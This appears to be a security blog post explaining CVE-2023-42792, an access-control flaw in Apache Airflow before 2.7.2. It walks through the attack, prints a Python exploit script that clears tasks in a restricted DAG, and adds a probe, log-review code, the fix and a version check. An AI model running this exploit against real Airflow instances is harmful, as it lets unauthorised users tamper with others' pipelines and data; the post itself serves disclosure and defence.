Apache Airflow is a powerful open-source platform for orchestrating complex workflows and data pipelines. But with great power comes the responsibility to keep your pipelines secure, especially when you rely on the web UI and API to manage access.



In this post, we’ll break down CVE-2023-42792, a serious security flaw in Apache Airflow versions before 2.7.2. It lets authenticated users with limited access take actions, such as clearing tasks, on workflows (DAGs) they shouldn’t even be able to see. We’ll walk through what went wrong, how the exploit works (with code), and the official fix. Let’s get started.

What is CVE-2023-42792?

CVE-2023-42792 is a privilege escalation vulnerability in Apache Airflow. If you’re running a version prior to 2.7.2, this bug may let any authenticated user with access to *some* DAGs manipulate other, supposedly restricted DAGs. These users are not limited to the workflows they own or are assigned. They can craft requests that *clear*, *set the state of*, or otherwise change DAGs entirely outside their permission scope.

In simple terms:

> A user could clear (and thereby re-run) tasks in DAGs they should not control.

How Does the Exploit Work?

The issue stems from improper resource checks in Airflow’s request handling. A user might be unable to see or edit a DAG in the web UI. They could still send a crafted POST request (to the REST API or directly to a web endpoint), and Airflow would act on it as if they had permission for that DAG.
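The toy model below makes "improper resource check" concrete. It is plain Python and not Airflow’s code. The User class, the vulnerable_can_clear and fixed_can_clear functions, and the DAG names are all hypothetical. The flawed check only asks whether the user may edit *some* DAG. The correct check asks about the specific DAG named in the request.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    """Hypothetical user record: the set of DAG IDs this user may edit."""
    name: str
    editable_dags: set = field(default_factory=set)


def vulnerable_can_clear(user: User, dag_id: str) -> bool:
    # Flawed: only checks that the user can edit *some* DAG and
    # never looks at which DAG the request actually targets.
    return len(user.editable_dags) > 0


def fixed_can_clear(user: User, dag_id: str) -> bool:
    # Correct: checks permission on the specific DAG named in the request.
    return dag_id in user.editable_dags


alice = User("alice", {"my_dag"})
print(vulnerable_can_clear(alice, "sensitive_dag"))  # True: the bug
print(fixed_can_clear(alice, "sensitive_dag"))       # False: access denied
```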

A typical attack follows these steps:

1. The user logs into Airflow and sees only their assigned DAGs.

2. The user intercepts a legitimate request (e.g., “clear tasks” on their own DAG) using browser dev tools or tools like Burp Suite or Postman.

3. The user modifies the request so it targets a restricted DAG, for example by replacing the DAG ID.

4. The user sends the modified request to the vulnerable endpoint.

5. Airflow processes the request because it skips the required permission check, and the user’s action is executed on the restricted DAG.
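The attack shows how small the change to an intercepted request can be. The body can stay identical while only the DAG ID in the URL path changes. The sketch below shows that edit on a REST API path of the form /api/v1/dags/{dag_id}/clearTaskInstances, which is the endpoint used in the example script later in this post. The retarget_dag_path helper is hypothetical. It only manipulates strings and sends nothing.

```python
from urllib.parse import urlsplit, urlunsplit


def retarget_dag_path(url: str, new_dag_id: str) -> str:
    """Swap the DAG ID segment in a .../dags/<dag_id>/... URL (hypothetical helper)."""
    parts = urlsplit(url)
    segments = parts.path.split("/")
    # Expected layout: ['', 'api', 'v1', 'dags', '<dag_id>', '<action>']
    idx = segments.index("dags") + 1
    segments[idx] = new_dag_id
    # Rebuild the URL, keeping scheme, host, query string, and fragment unchanged
    return urlunsplit(parts._replace(path="/".join(segments)))


captured = "http://airflow.example.com/api/v1/dags/my_dag/clearTaskInstances"
print(retarget_dag_path(captured, "sensitive_dag"))
# http://airflow.example.com/api/v1/dags/sensitive_dag/clearTaskInstances
```

A per-DAG permission check on the server is what makes this trivial edit harmless.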

> The vulnerability is especially dangerous in organizations where multiple teams or outside users share the same Airflow environment.

Example Exploit Code

> Disclaimer: This code is for educational purposes only. Do not use on production systems without permission.

Suppose there is a DAG called sensitive_dag that you should *not* be able to access, while you do have access to another DAG, my_dag. On a vulnerable instance, you could send a POST request that clears all tasks in sensitive_dag:

Python Example Using the requests Library

```python
import requests

# Airflow instance URL and the low-privilege user's credentials
AIRFLOW_URL = 'http://airflow.example.com'
USERNAME = 'attacker_user'
PASSWORD = 'attacker_password'

# Session object keeps the login cookies between requests
session = requests.Session()

# Authenticate via the web login form (simplified: a real Airflow login
# form typically also expects a CSRF token taken from the login page)
login_data = {
    'username': USERNAME,
    'password': PASSWORD,
}
session.post(f'{AIRFLOW_URL}/login/', data=login_data, timeout=30)

# Craft the clear request for a DAG this user is NOT permitted to access
dag_id = 'sensitive_dag'
endpoint = f'{AIRFLOW_URL}/api/v1/dags/{dag_id}/clearTaskInstances'

payload = {
    'dry_run': False,  # actually clear, rather than only listing what would be cleared
    'reset_dag_runs': False,
    'only_failed': False,
    'only_running': False,
    # Other optional params as needed
}

response = session.post(endpoint, json=payload, timeout=30)

if response.status_code == 200:
    print(f'[+] SUCCESS: Cleared tasks in {dag_id}')
else:
    print(f'[-] FAILED: {response.status_code} - {response.text}')
```

This script logs in and sends the crafted request. If the instance is vulnerable, the tasks in the forbidden DAG are cleared.
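You can check your own instance without changing anything by sending the same request with dry_run set to True. The clearTaskInstances endpoint then only reports which task instances would be cleared. The sketch below assumes the status-code meanings described in this post: 200 means the request was authorized, and 403 means the permission check rejected it. The helper names build_probe, interpret_status, and probe are hypothetical. Run the probe with a low-privilege test account against a DAG that account should not be able to reach.

```python
def build_probe(base_url: str, dag_id: str) -> tuple:
    """Return (url, payload) for a dry-run clearTaskInstances request."""
    url = f"{base_url.rstrip('/')}/api/v1/dags/{dag_id}/clearTaskInstances"
    payload = {"dry_run": True}  # list what would be cleared; modify nothing
    return url, payload


def interpret_status(status_code: int) -> str:
    """Map the HTTP status of the probe to a verdict (assumed meanings)."""
    if status_code == 200:
        return "VULNERABLE: request was authorized for a DAG outside the user's scope"
    if status_code == 403:
        return "OK: the permission check rejected the request"
    if status_code == 401:
        return "INCONCLUSIVE: authentication failed"
    return f"INCONCLUSIVE: unexpected status {status_code}"


def probe(session, base_url: str, dag_id: str) -> str:
    """Send the dry-run probe with an already-authenticated session
    (for example a requests.Session) and return a verdict."""
    url, payload = build_probe(base_url, dag_id)
    response = session.post(url, json=payload, timeout=30)
    return interpret_status(response.status_code)
```

For example, after authenticating a test account as in the script above, you would call probe(session, AIRFLOW_URL, 'sensitive_dag') and read the verdict.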

Why Is This So Bad?

- Data Integrity Risk: Unauthorized resets/clears may lead to data loss or duplicated ETL work.

- Sensitive Pipelines: Pipelines processing sensitive information can get tampered with by untrusted users.

- Hard-to-Detect: Airflow’s UI may not show log entries that make it immediately clear how the unauthorized actions happened.
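The UI may not make these actions obvious, so it can help to review event-log records directly. The sketch below is hypothetical and rests on three assumptions:

- You have already exported event-log records as dictionaries with owner, dag_id, and event fields, loosely modeled on Airflow’s event log.
- Clear-type actions appear with event names containing "clear".
- You maintain your own mapping of which users are assigned to which DAGs.

Verify these assumptions against your Airflow version before relying on the result.

```python
def find_suspicious_clears(records, assignments):
    """Return records where a user cleared tasks in a DAG they are not assigned to.

    records: iterable of dicts with 'owner', 'dag_id', 'event' keys (assumed format)
    assignments: dict mapping user name -> set of DAG IDs they may modify
    """
    suspicious = []
    for rec in records:
        event = (rec.get("event") or "").lower()
        if "clear" not in event:
            continue  # only clear-type actions are of interest (assumed naming)
        owner = rec.get("owner")
        if rec.get("dag_id") not in assignments.get(owner, set()):
            suspicious.append(rec)
    return suspicious


records = [
    {"owner": "alice", "dag_id": "my_dag", "event": "clear"},
    {"owner": "alice", "dag_id": "sensitive_dag", "event": "clear"},
    {"owner": "bob", "dag_id": "sensitive_dag", "event": "trigger"},
]
assignments = {"alice": {"my_dag"}, "bob": {"sensitive_dag"}}
for rec in find_suspicious_clears(records, assignments):
    print(rec)
# {'owner': 'alice', 'dag_id': 'sensitive_dag', 'event': 'clear'}
```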

How Was It Fixed?

Starting from Apache Airflow version 2.7.2, the vulnerable endpoints now *properly check* whether the requesting user has explicit permission to operate on all requested resources. Requests for DAGs outside their access are denied with a 403 Forbidden error.

Here’s a simplified sketch of the patched logic:

```python
# airflow/www/views.py (or API code), simplified; has_access() is illustrative
from flask import abort

if not has_access(requested_dag_id, current_user):
    abort(403, f"You do not have permissions to modify DAG: {requested_dag_id}")
```

Now, even with a crafted request, unauthorized users cannot affect resources they have not been granted access to.
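The fix description turns on the word *all*. A request that names several DAGs must be rejected if even one of them is outside the user’s scope. Here is a minimal, framework-free sketch of that rule. The authorize_request function and the permission set passed to it are hypothetical. The function returns an HTTP-style status code instead of calling Flask’s abort, so it can run on its own.

```python
from typing import Iterable, Set, Tuple


def authorize_request(requested_dag_ids: Iterable[str],
                      permitted_dag_ids: Set[str]) -> Tuple[int, str]:
    """Return (status, message): 200 only if every requested DAG is permitted."""
    denied = sorted(set(requested_dag_ids) - permitted_dag_ids)
    if denied:
        # A single unauthorized DAG is enough to reject the whole request.
        return 403, f"You do not have permissions to modify DAG(s): {', '.join(denied)}"
    return 200, "OK"


print(authorize_request(["my_dag"], {"my_dag"}))
# (200, 'OK')
print(authorize_request(["my_dag", "sensitive_dag"], {"my_dag"}))
# (403, 'You do not have permissions to modify DAG(s): sensitive_dag')
```

Checking the whole set up front means a request cannot hide a restricted DAG behind a permitted one.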

What Should You Do?

1. Upgrade Immediately: Move to version 2.7.2 or newer.

2. Audit User Permissions: Review all user access, especially if you cannot upgrade right away.

3. Check Logs for Suspicious Actions: Look for unexpected task clears, resets, or other resource changes.
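Before upgrading, you can quickly tell whether an environment is still in the affected range by comparing the installed version against 2.7.2. The sketch below uses only the standard library (importlib.metadata, Python 3.8+) and a deliberately simple parser for plain X.Y.Z version strings. It drops pre-release suffixes such as rc1, so treat it as a rough check rather than a full version comparator.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED_VERSION = (2, 7, 2)  # first release containing the CVE-2023-42792 fix


def parse_version(text: str) -> tuple:
    """Parse the leading X.Y.Z numbers; suffixes like 'rc1' are dropped."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError(f"Unrecognized version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version_text: str) -> bool:
    # Tuple comparison handles multi-digit parts correctly: (2, 10, 0) > (2, 7, 2)
    return parse_version(version_text) < FIXED_VERSION


if __name__ == "__main__":
    try:
        installed = version("apache-airflow")
    except PackageNotFoundError:
        print("apache-airflow is not installed in this environment")
    else:
        status = "AFFECTED, upgrade" if is_affected(installed) else "not affected"
        print(f"apache-airflow {installed}: {status}")
```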

References

- CVE Record: https://nvd.nist.gov/vuln/detail/CVE-2023-42792

- Apache Airflow Security Advisory:
  https://github.com/apache/airflow/pull/33403
  https://lists.apache.org/thread/ptnh6mx8m3x91t9xm01jjgh4brwvl77

- Official Release Notes: https://airflow.apache.org/docs/apache-airflow/2.7.2/release_notes.html

Conclusion

CVE-2023-42792 shows why regular updates and careful auditing are vital for shared data engineering platforms. Privilege escalation bugs like this can let insiders or malicious users break workflow boundaries, risking both data and trust.

Patch your Airflow as soon as you can, and watch those audit logs. As platforms get more complex, security should be a first-class concern, not an afterthought.

*If this post helped you, share it with your data platform team and stay safe out there.*

Timeline

Published on: 10/14/2023 10:15:10 UTC

Last modified on: 10/18/2023 18:50:16 UTC